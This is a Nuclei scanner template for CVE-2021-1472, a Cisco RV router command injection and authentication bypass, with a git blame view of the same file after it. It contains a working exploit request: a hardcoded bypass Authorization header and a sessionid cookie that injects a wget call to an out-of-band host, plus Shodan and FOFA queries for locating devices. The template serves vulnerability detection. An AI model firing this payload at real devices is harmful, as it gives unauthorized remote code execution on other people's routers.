nuclei-templates/http/cves/2021/CVE-2021-1472.yaml

id: CVE-2021-1472

info:
  name: Cisco Small Business RV Series - OS Command Injection
  author: gy741
  severity: critical
  description: |
    Cisco Small Business RV Series routers RV16X/RV26X versions 1.0.01.02 and before and RV34X versions 1.0.03.20 and before contain multiple OS command injection vulnerabilities in the web-based management interface. A remote attacker can execute arbitrary OS commands via the sessionid cookie or bypass authentication and upload files on an affected device.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected device.
  remediation: |
    Apply the latest security patches or firmware updates provided by Cisco to mitigate this vulnerability.
  reference:
    - https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/
    - https://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-1472
    - https://nvd.nist.gov/vuln/detail/CVE-2021-1473
    - http://seclists.org/fulldisclosure/2021/Apr/39
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-1472
    cwe-id: CWE-287,CWE-119
    epss-score: 0.97174
    epss-percentile: 0.99793
    cpe: cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cisco
    product: rv160_firmware
    shodan-query:
      - http.html:"Cisco rv340"
      - http.html:"cisco rv340"
    fofa-query: body="cisco rv340"
  tags: cve2021,cve,packetstorm,seclists,auth-bypass,injection,cisco,rce,intrusive

http:
  - raw:
      - |
        POST /upload HTTP/1.1
        Host: {{Hostname}}
        Cookie: sessionid='`wget http://{{interactsh-url}}`'
        Authorization: QUt6NkpTeTE6dmk4cW8=
        Content-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536

        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="option"

        5NW9Cw1J
        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="destination"

        J0I5k131j2Ku
        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="file.path"

        EKsmqqg0
        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="file"; filename="config.xml"
        Content-Type: application/xml

        qJ57CM9
        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="filename"

        JbYXJR74n.xml
        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="GXbLINHYkFI"

        <input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>
        -----------------------------392306610282184777655655237536--

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - http

      - type: word
        part: body
        words:
          - '"jsonrpc":'
# digest: 4b0a00483046022100dcd826a53f2d0e359b1cdaf8b06cacbb9e3b2103c9d2aa2da212b570e5b2339202210083a2d3610b5566d9dc998c8bdb3ab4677bc678f474a78192fa59b99aab23018f:922c64590222798bb761d5b6d8e72950
Dashboard Content Enhancements (#5324) Dashboard Content Enhancements * dos2nix on several templates * replacing some cvedetails links with NIST 2022-09-08 13:28:46 +00:00			`id: CVE-2021-1472`
Create cisco-rv-series-rce.yaml Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more infor mation about these vulnerabilities, see the Details section of this advisory. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-05-21 15:15:55 +00:00
			`info:`
Dashboard Content Enhancements (#5582) Dashboard Content Enhancements 2022-10-10 19:22:59 +00:00			`name: Cisco Small Business RV Series - OS Command Injection`
Create cisco-rv-series-rce.yaml Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more infor mation about these vulnerabilities, see the Details section of this advisory. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-05-21 15:15:55 +00:00			`author: gy741`
			`severity: critical`
			`description: \|`
Dashboard Content Enhancements (#5582) Dashboard Content Enhancements 2022-10-10 19:22:59 +00:00			`Cisco Small Business RV Series routers RV16X/RV26X versions 1.0.01.02 and before and RV34X versions 1.0.03.20 and before contain multiple OS command injection vulnerabilities in the web-based management interface. A remote attacker can execute arbitrary OS commands via the sessionid cookie or bypass authentication and upload files on an affected device.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected device.`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`remediation: \|`
			`Apply the latest security patches or firmware updates provided by Cisco to mitigate this vulnerability.`
Create cisco-rv-series-rce.yaml Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more infor mation about these vulnerabilities, see the Details section of this advisory. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-05-21 15:15:55 +00:00			`reference:`
			`- https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/`
			`- https://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-1472`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-1473`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- http://seclists.org/fulldisclosure/2021/Apr/39`
Create cisco-rv-series-rce.yaml Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more infor mation about these vulnerabilities, see the Details section of this advisory. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-05-21 15:15:55 +00:00			`classification:`
Auto Generated CVE annotations [Mon Oct 10 19:40:25 UTC 2022] :robot: 2022-10-10 19:40:25 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
Auto Generated CVE annotations [Sat Aug 27 04:41:18 UTC 2022] :robot: 2022-08-27 04:41:18 +00:00			`cve-id: CVE-2021-1472`
TemplateMan Update [Thu Nov 23 09:00:58 UTC 2023] :robot: 2023-11-23 09:00:58 +00:00			`cwe-id: CWE-287,CWE-119`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`epss-score: 0.97174`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`epss-percentile: 0.99793`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`cpe: cpe:2.3:o:cisco:rv160_firmware::::::::`
Update cisco-rv-series-rce.yaml 2022-07-18 09:52:26 +00:00			`metadata:`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: cisco`
			`product: rv160_firmware`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`shodan-query:`
			`- http.html:"Cisco rv340"`
			`- http.html:"cisco rv340"`
product/queries updated 2024-05-31 19:23:20 +00:00			`fofa-query: body="cisco rv340"`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2021,cve,packetstorm,seclists,auth-bypass,injection,cisco,rce,intrusive`
Create cisco-rv-series-rce.yaml Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more infor mation about these vulnerabilities, see the Details section of this advisory. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-05-21 15:15:55 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create cisco-rv-series-rce.yaml Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more infor mation about these vulnerabilities, see the Details section of this advisory. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-05-21 15:15:55 +00:00			`- raw:`
			`- \|`
			`POST /upload HTTP/1.1`
			`Host: {{Hostname}}`
			Cookie: sessionid='`wget http://{{interactsh-url}}`'
			`Authorization: QUt6NkpTeTE6dmk4cW8=`
			`Content-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536`

			`-----------------------------392306610282184777655655237536`
			`Content-Disposition: form-data; name="option"`

			`5NW9Cw1J`
			`-----------------------------392306610282184777655655237536`
			`Content-Disposition: form-data; name="destination"`

			`J0I5k131j2Ku`
			`-----------------------------392306610282184777655655237536`
			`Content-Disposition: form-data; name="file.path"`

			`EKsmqqg0`
			`-----------------------------392306610282184777655655237536`
			`Content-Disposition: form-data; name="file"; filename="config.xml"`
			`Content-Type: application/xml`

			`qJ57CM9`
			`-----------------------------392306610282184777655655237536`
			`Content-Disposition: form-data; name="filename"`

			`JbYXJR74n.xml`
			`-----------------------------392306610282184777655655237536`
			`Content-Disposition: form-data; name="GXbLINHYkFI"`

			`<input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>`
			`-----------------------------392306610282184777655655237536--`

Update cisco-rv-series-rce.yaml 2022-07-18 15:19:58 +00:00			`matchers-condition: and`
Create cisco-rv-series-rce.yaml Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more infor mation about these vulnerabilities, see the Details section of this advisory. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-05-21 15:15:55 +00:00			`matchers:`
			`- type: word`
			`part: interactsh_protocol`
			`words:`
			`- http`
Update cisco-rv-series-rce.yaml 2022-07-18 15:19:58 +00:00
			`- type: word`
			`part: body`
			`words:`
			`- '"jsonrpc":'`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 4b0a00483046022100dcd826a53f2d0e359b1cdaf8b06cacbb9e3b2103c9d2aa2da212b570e5b2339202210083a2d3610b5566d9dc998c8bdb3ab4677bc678f474a78192fa59b99aab23018f:922c64590222798bb761d5b6d8e72950`